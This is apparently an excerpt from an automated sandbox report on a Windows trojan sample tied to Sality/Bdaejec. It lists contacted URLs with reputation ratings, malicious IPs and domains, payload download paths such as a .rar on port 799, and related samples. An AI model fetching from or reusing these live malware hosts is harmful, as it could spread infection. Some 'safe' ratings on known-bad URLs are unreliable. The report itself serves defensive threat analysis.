        http://althawry.org/images/xs.jpg?3c7c82ae=1557994188#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://android.notify.windows.com/iOSpexplorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&ocexplorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.PurchasepWinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://apple-pie.in/images/xs.jpg?5f87de0d=2115991604p#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        		unknown
        http://apple-pie.in/images/xs.jpg?c7d4d608=1993464376g#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        		unknown
        https://www.msn.com/de-ch/play/games/master-checkers-multiplayer/cg-9p3c5sx31v9k&quot;SearchApp.exe, 0000001F.00000000.1555536007.000001D61A600000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4wSearchApp.exe, 0000001F.00000000.1555536007.000001D61A600000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1563305056.000001D61C0A9000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://althawry.org/images/xs.jpg?ee51bd01=-593266174#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://outlook.live.com/owahttps://outlook.office.com/owaCodexChatButtonUpperRightSearchApp.exe, 0000001F.00000000.1596602105.000001D62DEED000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://loki.delvSearchApp.exe, 0000001F.00000000.1558233883.000001D61AC39000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?e4bc5c05=1550460958LCuy#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://ns.adoraRuntimeBroker.exe, 0000001E.00000000.1527273745.0000023D7190D000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://173.193.19.14/logo.gifcscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://ntp.msn.com/web-widget?form=MSearchApp.exe, 0000001F.00000000.1592816727.000001D62DC41000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://g2.arrowhitech.com/xs.jpg?374a39ba=-584522008#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-darkexplorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://apple-pie.in/images/xs.jpg?63977b=19580529&#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        		unknown
        https://android.notify.windows.com/iOSZMexplorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://apple-pie.in/images/xs.jpgs.jpg#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        		unknown
        https://aefd.nelreports.net/api/report?cat=bingrmsSearchApp.exe, 0000001F.00000000.1543708623.000001CE1975E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1537183584.000001CE18838000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.careerdesk.org/images/xs.jpg?8021ab3c=-2145277124Qe#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.PaymentInstrumentsWinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://ddos.dnsnb8.net:799/cj//k1.rarioYMZwp.exe, 00000009.00000003.1305108589.0000000000C59000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        		unknown
        http://schemas.datacontract.org/2004/07/Store.PurchasepWinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-distexplorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://live.xbox.com/purchase/xbox/WinStore.App.exe, 00000024.00000000.1676939865.000001B9627F8000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000024.00000000.1676939865.000001B962800000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://xsts.auth.xboxlive.comsvchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1555660231.000001D61A642000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1550771232.000001D619B3D000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://ocsp.msocsp.SearchApp.exe, 0000001F.00000000.1550970635.000001D619BC4000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://althawry.org/images/xs.jpg?93473576=646867692#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://arthur.niria.biz/xs.jpg?60b080=25346560=#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://substrate.office365.us/search/api/v2/queryhttps://substrate.office.com/search/api/v2/querySearchApp.exe, 0000001F.00000000.1556603562.000001D61A820000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.microexplorer.exe, 0000001B.00000002.3974617181.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.1478266221.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.1469625863.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000001E.00000000.1528658066.0000023D73980000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 00000020.00000000.1645898785.000001EF6E6E0000.00000002.00000001.00040000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://amsamex.com/xs.jpg?73b8b348=-20599928806#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://ampyazilim.com.tr/images/xs2.jpg?a8241ece=-18553763721#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://kukutrustnet777888.info/DisableTaskMgrSoftware#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        		unknown
        https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqsSearchApp.exe, 0000001F.00000000.1608113405.000001D62E2D1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1592907269.000001D62DC47000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1616012570.000001D6305B0000.00000004.00000001.00040000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://althawry.org/images/xs.jpg#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://althawry.org/images/xs.jpg?17915f51=790806178#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        44.221.84.105
        		ddos.dnsnb8.netUnited States
        		14618AMAZON-AESUStrue
        78.46.2.155
        		ahmediye.netGermany
        		24940HETZNER-ASDEtrue
        54.244.188.177
        		www.careerdesk.orgUnited States
        		16509AMAZON-02UStrue
        37.230.104.89
        		ampyazilim.com.trTurkey
        		42807AEROTEK-ASTRtrue
        85.17.167.196
        		unknownNetherlands
        		60781LEASEWEB-NL-AMS-01NetherlandsNLfalse

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1467984
        Start date and time:2024-07-05 08:00:08 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 13m 33s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:20
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:22
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
        renamed because original name is a hash value
        Original Sample Name:.exe
        Detection:MAL
        Classification:mal100.spre.troj.evad.winEXE@8/133@107/5
        EGA Information:
        • Successful, ratio: 66.7%
        HCA Information:
        • Successful, ratio: 89%
        • Number of executed functions: 86
        • Number of non-executed functions: 211
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Override analysis time to 240s for sample files taking high CPU consumption

        Warnings

        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
        • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 20.42.65.84
        • Excluded domains from analysis (whitelisted): self-events-data.trafficmanager.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, self.events.data.microsoft.com, onedscolprdeus02.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target cscript.exe, PID 5220 because it is empty
        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtDeviceIoControlFile calls found.
        • Report size getting too big, too many NtEnumerateKey calls found.
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtSetValueKey calls found.
        • Report size getting too big, too many NtWriteVirtualMemory calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        02:00:53API Interceptor3836657x Sleep call for process: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe modified
        02:00:54API Interceptor1x Sleep call for process: dllhost.exe modified
        02:01:35API Interceptor515132x Sleep call for process: cscript.exe modified
        02:02:00API Interceptor1492x Sleep call for process: explorer.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        44.221.84.105a4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
        • arthur.niria.biz/xs.jpg?d2e6b20f=-1513266146
        1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • apple-pie.in/images/xs.jpg?ce2fff=121614327
        FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
        • suddencover.net/index.php
        FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
        • suddencover.net/index.php
        7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
        • englishproud.net/index.php
        7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
        • englishproud.net/index.php
        5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
        • englishproud.net/index.php
        5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
        • englishproud.net/index.php
        log1.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
        • ddos.dnsnb8.net:799/cj//k2.rar
        log2.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
        • ddos.dnsnb8.net:799/cj//k2.rar
        78.46.2.155a4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
        • ahmediye.net/xs.jpg?32b2701b=-1743302575
        1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • ahmediye.net/xs.jpg?e14213=73812575
        pXlV6TKi3E.exeGet hashmaliciousSalityBrowse
        • ahmediye.net/xs.jpg?6273be3=929110779
        Server.exeGet hashmaliciousMimikatz, SalityBrowse
        • ahmediye.net/xs.jpg?228483d4=579109844
        9zalmn1701.exeGet hashmaliciousSalityBrowse
        • ahmediye.net/xs.jpg?14ffade3=-1828863691
        54.244.188.177a4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
        • www.careerdesk.org/images/xs.jpg?85bd571b=385178732
        1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • www.careerdesk.org/images/xs.jpg?ad5654=34079484
        FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
        • cigaretteshoulder.net/index.php
        FXja4SyAYs.exeGet hashmaliciousUnknownBrowse
        • cigaretteshoulder.net/index.php
        ILTgEaPqmE.exeGet hashmaliciousUnknownBrowse
        • cigarettewritten.net/index.php
        ILTgEaPqmE.exeGet hashmaliciousUnknownBrowse
        • cigarettewritten.net/index.php
        Jla3M8Fe16.exeGet hashmaliciousUnknownBrowse
        • cigarettewritten.net/index.php
        Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
        • stillneedle.net/index.php
        gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
        • stillneedle.net/index.php
        Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
        • stillneedle.net/index.php

        Domains

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        ampyazilim.com.tra4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
        • 37.230.104.89
        1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • 37.230.104.89
        pXlV6TKi3E.exeGet hashmaliciousSalityBrowse
        • 37.230.104.89
        Server.exeGet hashmaliciousMimikatz, SalityBrowse
        • 37.230.104.89
        9zalmn1701.exeGet hashmaliciousSalityBrowse
        • 37.230.104.89
        apple-pie.ina4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
        • 44.221.84.105
        1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • 44.221.84.105
        pXlV6TKi3E.exeGet hashmaliciousSalityBrowse
        • 63.251.106.25
        Server.exeGet hashmaliciousMimikatz, SalityBrowse
        • 63.251.106.25
        9zalmn1701.exeGet hashmaliciousSalityBrowse
        • 63.251.106.25
        ahmediye.neta4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
        • 78.46.2.155
        1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • 78.46.2.155
        pXlV6TKi3E.exeGet hashmaliciousSalityBrowse
        • 78.46.2.155
        Server.exeGet hashmaliciousMimikatz, SalityBrowse
        • 78.46.2.155
        9zalmn1701.exeGet hashmaliciousSalityBrowse
        • 78.46.2.155
        www.careerdesk.org1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • 54.244.188.177
        pXlV6TKi3E.exeGet hashmaliciousSalityBrowse
        • 206.191.152.58
        Server.exeGet hashmaliciousMimikatz, SalityBrowse
        • 206.191.152.58
        HP8odfgSjP.exeGet hashmaliciousSalityBrowse
        • 206.191.152.58
        9zalmn1701.exeGet hashmaliciousSalityBrowse
        • 206.191.152.58
        #U622a#U56fe.exeGet hashmaliciousSalityBrowse
        • 206.191.152.58
        arthur.niria.biza4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
        • 44.221.84.105
        1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • 44.221.84.105
        pXlV6TKi3E.exeGet hashmaliciousSalityBrowse
        • 63.251.106.25
        Server.exeGet hashmaliciousMimikatz, SalityBrowse
        • 63.251.106.25
        HP8odfgSjP.exeGet hashmaliciousSalityBrowse
        • 63.251.106.25
        9zalmn1701.exeGet hashmaliciousSalityBrowse
        • 63.251.106.25
        #U622a#U56fe.exeGet hashmaliciousSalityBrowse
        • 63.251.106.25
        ddos.dnsnb8.neta4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
        • 44.221.84.105
        1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • 44.221.84.105
        log1.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
        • 44.221.84.105
        log2.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
        • 44.221.84.105
        2.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        gracNYJFpD.exeGet hashmaliciousBdaejec, GhostRat, Nitol, Young LotusBrowse
        • 44.221.84.105
        xpKZwKFN9W.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        LVF7FM9Z4I.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        hJSrJRHret.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        KFt0cactum.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        LEASEWEB-NL-AMS-01NetherlandsNLa4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
        • 85.17.167.196
        1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • 85.17.167.196
        http://cacahs.fdavm.com/Get hashmaliciousUnknownBrowse
        • 178.162.175.77
        https://reservation.exnetehovervs.com/apart/285z92aaza77zGet hashmaliciousUnknownBrowse
        • 185.17.186.162
        http://cacahs.fdavm.com/Get hashmaliciousUnknownBrowse
        • 178.162.175.77
        http://multichaindappsx.pages.dev/Get hashmaliciousUnknownBrowse
        • 89.149.193.105
        http://booking.extnnehotteir.com/admin/o2shi1bka89Get hashmaliciousUnknownBrowse
        • 185.17.186.161
        8bwKawHg0Z.exeGet hashmaliciousFormBookBrowse
        • 79.170.242.64
        SOA 020724.exeGet hashmaliciousFormBookBrowse
        • 212.32.237.91
        https://supp-review9482.eu/Get hashmaliciousUnknownBrowse
        • 185.17.186.162
        AMAZON-AESUSa4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
        • 44.221.84.105
        1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • 44.221.84.105
        FFbd.dllGet hashmaliciousUnknownBrowse
        • 50.16.47.176
        https://rb.gy/zsqpjaGet hashmaliciousHTMLPhisherBrowse
        • 18.211.218.206
        https://singingfiles.com/show.php?l=0&u=2156442&id=64574Get hashmaliciousUnknownBrowse
        • 34.203.90.74
        https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1Get hashmaliciousUnknownBrowse
        • 34.201.239.212
        http://multichaindappsx.pages.dev/Get hashmaliciousUnknownBrowse
        • 52.72.219.252
        https://swans-muffin-1id4964-7304421.netlify.app/formGet hashmaliciousUnknownBrowse
        • 54.205.31.52
        http://diffusion-florentine-facilitated.netlify.app/form.htmlGet hashmaliciousUnknownBrowse
        • 18.213.222.111
        https://reg1a-g4ad23-269fe50-lqng5s.netlify.app/dev.html/Get hashmaliciousUnknownBrowse
        • 54.147.25.172
        AEROTEK-ASTRa4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
        • 37.230.104.89
        1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • 37.230.104.89
        hesaphareketi-01.pdf.exeGet hashmaliciousAgentTeslaBrowse
        • 94.199.200.98
        739077083533. FedEX_13100976 _20.05.2024 %100%_jpg.exeGet hashmaliciousAgentTeslaBrowse
        • 94.199.206.42
        024 - PT MARGATEK_ SETYATAMA PO 13100976 _20.05.2024 %100%_jpg .exeGet hashmaliciousAgentTeslaBrowse
        • 94.199.206.42
        oae7jKW2lr.exeGet hashmaliciousAgentTeslaBrowse
        • 109.232.216.54
        #U0130#U015eLEM #U00d6ZET#U0130_20524057699-1034 nolu TICARI.exeGet hashmaliciousAgentTeslaBrowse
        • 94.199.206.42
        F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 109.232.216.54
        F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130.exeGet hashmaliciousAgentTeslaBrowse
        • 109.232.216.54
        F#U0130YAT TALEB#U0130.exeGet hashmaliciousAgentTeslaBrowse
        • 109.232.216.54
        AMAZON-02USa4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
        • 54.244.188.177
        1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • 54.244.188.177
        poMkNYHDU3.exeGet hashmaliciousRemcosBrowse
        • 104.192.141.1
        NtjLYDrHzE.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
        • 15.229.32.8
        PTT Group project - Quotation.exeGet hashmaliciousFormBookBrowse
        • 13.248.169.48
        https://singingfiles.com/show.php?l=0&u=2156442&id=64574Get hashmaliciousUnknownBrowse
        • 18.239.50.108
        https://metamesklogni.webflow.io/Get hashmaliciousUnknownBrowse
        • 52.222.232.144
        https://rules-pear-kft5d2.mystrikingly.com/Get hashmaliciousUnknownBrowse
        • 143.204.176.115
        https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1Get hashmaliciousUnknownBrowse
        • 13.227.219.3
        http://review-page-violation-issue-meta-center.vercel.app/Get hashmaliciousUnknownBrowse
        • 76.76.21.98
        HETZNER-ASDEa4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
        • 78.46.2.155
        1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
        • 78.46.2.155
        https://gmoq4wwvl9phy.pages.dev/smart89/Get hashmaliciousUnknownBrowse
        • 195.201.57.90
        lem.exeGet hashmaliciousVidarBrowse
        • 5.75.221.27
        0001.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 176.9.105.210
        file.exeGet hashmaliciousVidarBrowse
        • 49.13.159.121
        Scan405.exeGet hashmaliciousFormBookBrowse
        • 116.202.213.59
        ScanPDF_102.exeGet hashmaliciousFormBookBrowse
        • 116.202.213.59
        https://vi-822.pages.dev/robots.txtGet hashmaliciousHTMLPhisherBrowse
        • 5.161.38.67
        https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.deGet hashmaliciousHTMLPhisherBrowse
        • 5.161.38.67

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\user\AppData\Local\Temp\YMZwp.exea4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
          1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
            log1.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
              log2.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
                2.exeGet hashmaliciousBdaejecBrowse
                  gracNYJFpD.exeGet hashmaliciousBdaejec, GhostRat, Nitol, Young LotusBrowse
                    xpKZwKFN9W.exeGet hashmaliciousBdaejecBrowse
                      LVF7FM9Z4I.exeGet hashmaliciousBdaejecBrowse
                        hJSrJRHret.exeGet hashmaliciousBdaejecBrowse
                          KFt0cactum.exeGet hashmaliciousBdaejecBrowse
